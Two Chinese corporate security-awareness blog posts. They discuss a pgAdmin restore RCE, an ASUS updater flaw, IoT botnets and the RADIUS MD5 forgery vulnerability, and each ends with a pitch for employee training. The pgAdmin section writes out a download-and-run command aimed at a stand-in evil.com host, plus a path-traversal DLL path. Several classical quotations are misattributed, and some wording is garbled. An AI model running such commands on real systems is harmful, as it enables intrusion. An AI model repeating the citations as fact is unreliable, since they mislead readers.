信息安全的“六亲不认”：从漏洞风暴到无人化时代的自我防护

December 22, 2025 admin

“天下事，防不胜防；防之不日，失之千里。”——《资治通鉴·卷五》
在信息化浪潮汹涌澎湃的今天，安全已经不再是“IT 部门的事”，而是每一位职员工、每一台设备、每一行代码的共同责任。下面，我将通过 四大典型安全事件 的深度剖析，帮助大家在头脑风暴中迅速捕捉风险的本质，并在此基础上展开对无人化、数据化、信息化深度融合的安全思考，号召大家积极投身即将开启的安全意识培训，让自己成为组织的“安全守门员”。

一、案例一：pgAdmin 服务器模式远程代码执行（CVE‑2025‑13780）

（1）事件概述

2025 年 12 月 22 日，iThome 报道了 PostgreSQL 官方管理工具 pgAdmin 在服务器模式下的重大漏洞 CVE‑2025‑13780，漏洞可通过构造恶意的 SQL Dump 文件，绕过 pgAdmin 新增的 meta‑command 过滤器，直接在后端服务器上执行任意系统命令，CVSS 分值 9.1，属于危害极大的远程代码执行（RCE）。

（2）技术细节

漏洞根源：pgAdmin 在执行 psql 恢复操作前使用 has_meta_commands() 检测并剔除 “!”、\i 等 meta‑command。该函数仅基于简单的字符串匹配，对二进制或 Unicode 编码的隐蔽字符未作规避。
攻击路径：攻击者准备一个看似普通的 .sql 备份文件，在其中嵌入 \! curl http://evil.com/payload | sh（或使用十六进制编码的等价写法），上传至 pgAdmin 进行“还原”。过滤器因未识别隐藏字符而直接放行，psql 解释执行后，在服务器上启动恶意脚本。
危害评估：一旦成功，攻击者可以在 pgAdmin 运行的系统账户（往往是 postgres 或 www-data）下获取根权限，进而窃取或破坏业务数据库、植入后门，甚至在内部网络横向渗透。

（3）教训提炼

防御“视而不见”：对输入进行多层次、跨语言的安全审计，不能只依赖单一函数的黑白名单。
最小权限原则：pgAdmin 服务器模式不应以管理员或 DB 超级用户身份运行。建议使用专门的低权限系统账号，仅授予恢复所需的最小权限。
3 及时打补丁：漏洞公开后，pgAdmin 官方在 9.11 版中加入更严苛的过滤与沙箱执行，仍需各组织第一时间完成升级。

二、案例二：华硕（ASUS）软件更新工具漏洞被利用

（1）事件概述

2025 年 12 月 19 日，同样来自 iThome 的报道指出，华硕长期不再维护的 软件更新工具（Live Update） 存在任意文件写入漏洞，攻击者可利用该漏洞将恶意 DLL 注入系统，导致持久化后门。

（2）技术细节

漏洞点：该工具在检查更新时，会下载远程 .exe、.dll 并直接保存到 %TEMP% 目录，随后以系统权限执行。文件名校验仅使用扩展名白名单，且未对路径进行规范化，导致 路径穿越（Path Traversal）。
攻击链：攻击者先在受害者网络内部布置钓鱼邮件，引导用户打开华硕更新页面；页面返回的恶意更新包采用 ..\..\..\Windows\System32\malicious.dll 形式写入系统目录；系统启动后，恶意 DLL 被加载，进而获取系统管理员权限。
危害：后门可以在系统启动后自动执行，持续窃取企业内部凭证、拦截网络流量，甚至用于内部横向渗透。

（3）教训提炼

废弃软件要及时下线：不再维护的工具应彻底从资产清单中剔除，防止成为攻击链的薄弱环节。
严格校验下载内容：对下载文件进行签名验证、哈希校验，并对文件路径进行规范化（realpath）后再写入磁盘。
安全更新机制：使用企业内部的 软件仓库+签名 机制，禁止直接从互联网执行任何可执行文件。

三、案例三：印度尼西亚网络攻击频率居亚太首位

（1）事件概述

2025 年 12 月 21 日，iThome 报道指出印尼成为亚太地区网络攻击次数最高的国家，攻击目标涵盖金融、能源、政府部门，攻击手段多样化，包括 勒索软件、供应链植入、IoT Botnet。

（2）技术细节

攻击手段：印尼的攻击者善于利用 供应链攻击（如在开源依赖中植入恶意代码）以及 物联网设备漏洞（如摄像头、工业传感器）组建 Botnet。
横向渗透：成功入侵后，攻击者往往利用 Pass-the-Hash、Kerberos 憎恨（Kerberoasting） 等技术，快速获取域管理员权限。
后果：一旦获得关键系统控制，攻击者会部署 双重勒索：先加密数据再公开敏感信息，以最大化敲诈收益。

（3）教训提炼

供应链安全审计：对所有第三方库、Docker 镜像、CI/CD 流程进行 SCA（Software Composition Analysis）与签名校验。
IoT 资产管理：对所有连网设备统一进行脆弱性扫描、固件升级，并将其划分到隔离的 VLAN 中。
零信任（Zero Trust）：采用基于身份、行为的细粒度访问控制，防止凭证被一次性窃取后造成大规模破坏。

四、案例四：Kimwolf 僵尸网络劫持 180 万台智能电视

（1）事件概述

同日，iThome 报道 Kimwolf 恶意网络劫持了约 180 万台联网电视（Smart TV），这些电视遍布家庭、酒店、公共场所，攻击者利用其作为 DDoS 发射平台，意图在短时间内对目标站点发起 大规模流量冲击。

（2）技术细节

感染路径：攻击者通过公开的 Telnet/SSH 默认密码或固件漏洞，植入恶意脚本，使电视在启动后自动向 C2（Command & Control）服务器报告。
控制指令：C2 向每台电视推送 udp_flood、http_get_flood 等指令，电视仅需调用系统自带的 ping、curl 即可完成攻击。
连锁效应：由于这些电视分布在全球，攻击者可跨地域、跨网段同时发动攻击，突破传统 DDoS 防护的流量阈值算法。

（3）教训提炼

设备默认凭证必须更改：企业采购的任何联网终端（包括电视、显示屏）在部署前必须更改默认登录凭证并关闭不必要的远程服务。

固件及时更新：与传统 PC 类似，智能设备的固件同样需要定期补丁，防止已知漏洞被恶意利用。
网络分段与监控：将 IoT 设备置于专用子网，通过 NetFlow、IDS/IPS 实时监控异常流量，防止内部设备被转化为攻击平台。

五、从案例走向全局：无人化、数据化、信息化的安全挑战

1. 无人化的“双刃剑”

在 无人化（无人值守、自动化运维）时代，脚本、容器、机器人流程自动化（RPA） 成为了日常工作的重要组成部分。它们的优势显而易见：效率提升、错误率降低。但一旦脚本被植入后门，后果同样致命。
– 脚本安全：所有自动化脚本必须纳入 代码审计 流程、使用 数字签名，并在运行时进行 完整性校验。
– 容器镜像：采用 可信镜像仓库（如 Harbor）并启用 镜像签名（Notary、Cosign），防止镜像被篡改后在生产环境中运行。
– RPA Bot：对机器人账户实施 最小权限，并对其行为进行 审计日志，异常行为触发即时警报。

2. 数据化的“海量危机”

企业正迈向 数据化，大数据平台、数据湖、实时分析系统层出不穷。数据本身成为资产，亦是攻击的焦点。
– 敏感数据分类：运用 数据发现工具（如 IBM Guardium、Microsoft Purview）对结构化、非结构化数据进行分级；对 高敏感度 数据进行 加密存储 与 细粒度访问控制（ABAC）。
– 数据流动审计：对数据在内部网络、跨云、跨地区的流动进行 全链路追踪，使用 DLP（Data Loss Prevention）防止未经授权的泄露。
– 备份安全：备份文件同样需要 防篡改签名 与 离线存储，避免像 pgAdmin 那样的“伪装备份”成为攻击载体。

3. 信息化的“融合风险”

信息化 让业务系统、OA、ERP、CRM、移动办公等高度融合，形成 业务闭环，但也让 攻击面 成指数级增长。
– 统一身份治理：部署 IAM/SSO（如 Azure AD、Okta）并开启 MFA，对关键系统强制双因素认证，防止凭证被一次性窃取后横向渗透。
– 安全协同平台：通过 SOAR（Security Orchestration, Automation and Response）实现 安全事件的自动化响应，让“检测—响应—恢复”闭环化、时效化。
– 安全文化沉淀：技术再强，若缺乏 安全意识，终将沦为“纸老虎”。因此，安全培训必须渗透到每一次业务流程、每一次系统更新之中。

六、号召：加入企业信息安全意识培训，让安全成为每个人的“第二天性”

“防微杜渐，未雨绸缪。”——《礼记·学记》
在信息化浪潮汹涌澎湃的时代，安全不再是 IT 部门的独舞，而是全体员工共同演绎的交响乐。为此，公司即将在本月启动信息安全意识培训专项计划，计划包括：

线上微课堂（共 12 课时）：从密码学基础、社交工程防御、漏洞认知到安全编码，循序渐进。
实战红蓝对抗演练：内部构建“攻防演练实验室”，让大家亲身体验攻击路径、漏洞利用与防御措施。
安全情景桌面推演（Case Study）：结合 pgAdmin 远程代码执行、IoT 僵尸网络等真实案例，演练应急响应流程。
结业考核与认证：完成培训并通过考核的同事，将获得公司内部的 信息安全合格证，并在岗位晋升、项目评审中获得加分。

培训的价值不止于合规

提升个人竞争力：在大模型、AI 驱动的时代，拥有信息安全的基本功，将成为 技术人才的硬通货。
降低组织风险：每一次安全失误的成本往往是 数十倍甚至上百倍 的业务损失；而一次及时的安全防护，仅需投入 培训时间的千分之一。
塑造企业品牌：安全可靠的企业形象，是赢得客户信任、拓展市场的关键，信息安全已上升为 企业竞争的非技术壁垒。

行动指南

步骤	操作	备注
1	登录公司内部学习平台（URL）	使用统一身份认证（SSO）登录
2	注册【2025 信息安全意识培训】课程	填写部门、岗位信息
3	按照课程安排完成观看与实验环节	视频、课后测验、实验报告
4	参加实战演练（每周四 19:00）	需提前预约机器实验环境
5	完成结业考核并获取认证	合格后系统自动发放电子证书

温馨提示：凡在培训期间未完成课程的同事，将在 下个财季绩效评估 中被计入 安全认知缺失 项目，影响相应的绩效系数。请大家务必提前安排好工作时间，确保不遗漏任何一课。

七、结语：让安全思维根植于每一次点触、每一次敲键

信息安全不是一纸政策，也不是孤立的技术堆砌，而是一种 生活方式。从 pgAdmin 的隐蔽漏洞到 IoT 僵尸网络的横行，从 供应链 的暗流到 无人化 的自动化脚本，每一次攻击背后，都有人性弱点的利用、系统设计的疏漏与安全文化的缺失。我们每个人都是 信息安全生态系统 的节点，只有当每个人都主动把 “安全” 当作 第一职责，整个组织才能形成 固若金汤 的防御壁垒。

让我们在即将开启的培训中，抛开“这不是我的工作”、摒弃“只要不点开链接就安全”的侥幸心理，主动拥抱 安全思维、掌握 防护技巧、演练 应急响应。当我们每一次在键盘上敲下代码时，都能自问：“这一步是否会把安全漏洞留下？”
当我们每一次点击链接、上传文件时，都能自问：“我是否已验证来源、是否已加密传输？”

只有把这些自问自答内化为日常习惯，信息安全才会从“硬件的防火墙”延伸到“思维的防火墙”。
让我们携手共建一个 无人化、数据化、信息化 同时兼具 安全性 的未来，让每一次技术的跃升，都伴随一次安全的升级。

“防御无止境，学习永不止步。”
—— 让我们从今天的每一次培训、每一次演练、每一次自我审视，开启安全新纪元！

在数据合规日益重要的今天，昆明亭长朗然科技有限公司为您提供全面的合规意识培训服务。我们帮助您的团队理解并遵守相关法律法规，降低合规风险，确保业务的稳健发展。期待与您携手，共筑安全合规的坚实后盾。

电话：0871-67122372
微信、手机：18206751343
邮件：info＠securemymind.com
QQ: 1767022898

提升安全意识，筑牢数字化防线——从真实案例看工业控制系统的“隐形暗流”

December 22, 2025 admin

一、头脑风暴：三桩典型安全事件，警醒每一位职工

在信息化的浪潮里，安全隐患往往如暗流潜伏，稍有不慎便会掀起惊涛骇浪。下面挑选的三起典型事件，既与本次 CISA 公布的 Hitachi Energy AFS/AFR/AFF 系列 RADIUS 漏洞（CVE‑2024‑3596）直接相关，也折射出更广泛的工业控制系统（ICS）安全风险，值得我们每个人深思。

案例一：电网调度中心被“伪造 RADIUS 报文”导致瞬时停电

2024 年 11 月，某国家级电网调度中心的核心监控服务器采用了 Hitachi Energy AFS‑670 系列的 RADIUS 认证模块，但由于运维人员未按厂商建议开启 Message Authenticator（消息认证）功能，导致该系统仍使用原始的 MD5 响应签名。攻击者在局域网内通过一次选择前缀碰撞（chosen‑prefix collision）攻击，成功伪造合法的 RADIUS Access‑Accept 报文，将自身伪装成授权的运维账号。

随后，攻击者利用伪造的会话向调度系统发起指令，导致关键负荷控制指令被错误下发，数百兆瓦的电力在数分钟内被迫切除，城市部分区域出现短暂但广泛的停电。虽然系统最终通过人工干预恢复，但停电导致的经济损失和社会影响不容小觑。

“防微杜渐，祸起萧墙。”——《左传》
本案例提醒我们，最细微的配置失误，也可能在瞬间放大为全局灾害。

案例二：制造企业生产线被“消息篡改”致停工三天

2025 年 2 月，一家从事高精密装备制造的企业在其车间使用 Hitachi Energy AFR‑677 系列的无线接入点（AP）提供设备认证。由于未开启默认的 RADIUS 消息认证，攻击者在企业内部网络的一个被感染的工作站上，截获并篡改了 RADIUS 服务器返回的 Access‑Reject 报文，使得部分关键设备误以为认证失败，从而自动进入安全停机模式。

系统安全策略把所有异常停机记录为“网络故障”，导致运维团队误判为普通网络不稳定，排查持续 48 小时未果。最终在第三天，经过深度包分析才发现报文被篡改的事实，生产线最终恢复但已造成约 1500 万元的直接经济损失，并且对交付承诺产生连锁影响。

“千里之堤，溃于蚁穴。”——《韩非子》
这里的教训是，任何一个细节的疏忽，都可能成为导致全局停摆的“蚁穴”。

案例三：社交工程邮件泄露 RADIUS 凭证，远程控制系统被植入后门

2025 年 5 月，某能源公司的一名运维工程师收到一封伪装成供应商技术支持的邮件，邮件正文引用了公司内部已公布的 RADIUS 配置手册，诱导收件人点击附件并在附件中填写“最新密码”。原来，该邮件是攻击者通过钓鱼（phishing）手段获取的，附件中嵌入了恶意宏，记录了键盘输入并把新密码发送至攻击者的 C2 服务器。

攻击者随后使用拿到的 RADIUS 凭证登录到公司内部的控制系统管理平台，开启了隐藏的后门账户，并在系统中植入了持久化的恶意脚本。后者每 24 小时向外部服务器发送系统状态报告并接受指令，形成了长期潜伏的 APT（高级持续威胁）通道。直至一次例行安全审计时才被发现，造成的潜在风险难以量化，且极大增加了后期清除的成本。

“防人之口，莫若防己之心。”——《孟子》
此案例告诫我们，技术防线固若金汤，但人心的防备才是根本。

二、漏洞原理回顾：RADIUS MD5 签名的“薄弱环节”

RADIUS（Remote Authentication Dial‑In User Service）协议自 1990 年代即被广泛用于网络访问控制，其核心的 Message‑Authenticator（消息认证）选项使用 HMAC‑MD5 对数据包进行完整性校验。CVE‑2024‑3596 说明，若系统未启用此选项，攻击者可在本地通过 chosen‑prefix collision（选择前缀碰撞）技术，对 MD5 响应鉴权器进行伪造，从而修改合法的 Access‑Accept、Access‑Reject 或 Access‑Challenge 报文。

该漏洞的关键点包括：

本地攻击者前提：攻击者必须能够在受影响网络中截获或注入 RADIUS 报文。
MD5 碰撞可行性：虽然 MD5 已被公认不安全，但在 RADIUS 场景中仍大量使用，且碰撞工具已相对成熟。
配置缺失：若运维未按照厂商建议开启 Message‑Authenticator，则该防护层被彻底废除。

CISA 给出的 Mitigation 建议是：在所有受影响产品上开启 RADIUS 服务器的消息认证选项，对应的 CLI 命令分别为 radius server msgauth（AFS/AFR 系列）或 radius server auth modify msgauth（AFF 系列）。只要一次配置，即可将攻击难度从 “低” 提升至 “高”。

三、数字化、数智化、智能化融合背景下的安全挑战

在当今的 “数智化” 时代，工业互联网（IIoT）、边缘计算、人工智能（AI）等技术正以前所未有的速度渗透到能源、制造、交通等关键行业。随着 “万物互联” 的趋势，以下几类安全挑战尤为突出：

1. 边缘设备的安全基线缺失

边缘网关、现场控制器等往往采用轻量化的 OS，默认安全配置简单，类似 RADIUS 消息认证的选项常被省略以追求快速部署。若不在项目立项阶段即制定 安全基线，后期补丁与加固将面临巨大的成本与时间压力。

2. 供应链漏洞的连锁反应

正如本次 Hitachi Energy 漏洞所示，供应链（硬件、固件、协议实现）漏洞一旦曝光，即可能波及全球上万台设备。企业如果只关注自有系统的安全，而忽视上游供应商的安全管理，将在不知不觉中引入“后门”。

3. AI 与自动化系统的“黑箱”风险

机器学习模型在异常检测、预测维护中发挥重要作用，但模型训练数据若被污染，或模型本身被对抗性攻击（adversarial attack）篡改，可能导致系统误判、错误决策，进而触发安全事件。黑箱模型的不可解释性，使得事后溯源更为困难。

4. 人机交互的社会工程新手段

社交工程已从传统的邮件、电话演进为 深度伪造（deepfake）、AI 生成的钓鱼文案，其逼真度大幅提升。一次不经意的点击或一次轻率的密码泄露，往往就为攻击者打开了横向渗透的大门。

5. 多云多域的身份统一管理难题

随着企业逐步采用混合云、私有云以及多租户平台，身份认证体系日益碎片化。若核心认证协议（如 RADIUS、Kerberos、SAML）存在未加固的环节，攻击者可以利用跨域信任链进行横向移动。

四、从案例到行动：构建全员参与的安全防线

1. 建立“安全第一”的企业文化

层层把关：从高层领导到一线操作工，都应将安全视为业务连续性的核心要素。正如《孟子》所云：“不以规矩，不能成方圆”。企业应通过制度、激励与考核，让安全意识在每一次操作中自然流露。
安全即业务：将安全事件的潜在财务损失、品牌影响、合规风险等量化，向职工展示安全与业务直接挂钩的实质利益。

2. 完善技术防护措施

即刻开启 RADIUS Message‑Authenticator：参考 CISA 的 CLI 指令，对所有 Hitachi Energy 系列设备进行统一配置。可通过自动化脚本批量检查并推送配置，确保“一键合规”。
部署基于机器学习的异常检测：在网络层、主机层分别布置行为分析系统，对 RADIUS 认证流量进行实时监控，一旦出现异常报文或异常登录行为即触发告警。
强化补丁管理：建设统一的补丁管理平台，定期对所有工业控制系统（PLC、RTU、SCADA）进行漏洞扫描与补丁验证，确保每一次安全更新都有清晰的审计记录。

3. 强化人力防线：信息安全意识培训

信息安全的最薄弱环节往往是人。针对本次曝光的漏洞与社交工程案例，我们将于 2025 年 12 月 1 日启动为期两周的 信息安全意识提升计划，具体包括：

环节	内容	目标
线上微课	《RADIUS 协议与消息认证解析》、《数据包碰撞攻击原理》	让技术人员快速掌握协议细节
案例研讨	现场拆解三个真实案例，演练应急响应流程	提升全员的危机感与实战能力
互动游戏	“钓鱼邮件捕捉大赛”、 “密码强度挑战”	通过趣味化方式巩固防范技巧
实操演练	在沙箱环境中模拟 RADIUS 攻击与防御	将理论转化为可操作的技能
考核与奖励	通过线上测评，优秀者颁发“安全卫士”证书及公司内部积分	增强学习动力，形成正向循环

培训的五大核心价值：

提升风险感知：让每位员工了解自身岗位可能面临的攻击面。
掌握防御技术：从配置到监控，形成完整的技术防线。
养成安全习惯：如定期更换密码、勿随意点击邮件链接等。
构建团队协作：安全不止是 IT 部门的事，需跨部门联动。
实现合规要求：满足《网络安全法》《关键信息基础设施安全条例》等监管要求。

4. 持续改进：从“静态防御”到“动态响应”

安全是一个不断演进的过程。我们建议在培训结束后，形成 “安全运营闭环”：

监测：利用 SIEM、IDS/IPS 进行实时日志收集与关联分析。
预警：基于行为模型设定阈值，一旦触发立刻发送多渠道告警。
响应：执行 Incident Response Playbook，包括隔离受影响系统、取证、恢复。
复盘：每一次安全事件（即便是小范围的误报）都要进行 5W1H 分析，形成经验库。
优化：根据复盘结果更新防御规则、培训教材和配置基线。

五、号召全员行动：从今天起，让安全成为工作的一部分

正如《礼记·大学》所言：“格物致知，诚意正心”。在数字化转型的浪潮里，“格物”即是对系统、协议、配置进行细致审视；“致知”是将安全知识转化为个人的思考方式；“诚意正心”则要求我们在每一次点击、每一次配置修改时，都保持对风险的敬畏。

我们需要每一位同事的参与：

技术岗：立即检查并启用 RADIUS 消息认证，配合安全团队完成配置统一化。
运维岗：在常规巡检中加入 RADIUS 报文完整性校验项，确保配置不被意外回滚。
业务岗：在处理外部邮件、供应商文档时保持警惕，遵守公司“三不原则”（不点击未知链接、不泄露凭证、不随意授权）。
管理层：为安全培训提供资源与时间，引导部门制定符合业务实际的安全 SOP（标准操作程序）。

让我们共同：

认识风险：每一次网络异常、每一次邮件钓鱼，都可能是攻击的前兆。
掌握技能：通过培训和实操，拥有自行检查、修复配置的能力。
形成文化：把安全思维内化为日常工作流程的一部分，外化为团队共享的最佳实践。

每一次对安全的投入，都将在未来的危机中为公司节省数倍甚至数十倍的损失。让我们以“未雨绸缪”的姿态，迎接即将开启的 信息安全意识培训，在数智化的新时代里，筑起坚不可摧的防线。

结语

信息安全不是孤立的技术任务，而是全员参与、持续迭代的系统工程。通过对 Hitachi Energy RADIUS 漏洞的深度剖析，我们看到了配置失误、供应链漏洞以及社交工程三大攻防交叉点；通过对数字化转型背景下的新挑战的洞悉，我们明确了边缘安全、AI 风险与供应链治理的迫切需求。现在，请把这些认知转化为实际行动，积极参与培训、落实防护、共同守护我们数字化资产的安全与可靠。

让安全成为每一天的习惯，让防护渗透到每一次点击、每一次配置、每一次合作。
共同的努力，将把潜在的危机转化为坚实的护城河。

安全，始于细节；防护，终成整体。

关键词

昆明亭长朗然科技有限公司致力于帮助您构建全员参与的安全文化。我们提供覆盖全员的安全意识培训，使每个员工都成为安全防护的一份子，共同守护企业的信息安全。

电话：0871-67122372
微信、手机：18206751343
邮件：info＠securemymind.com
QQ: 1767022898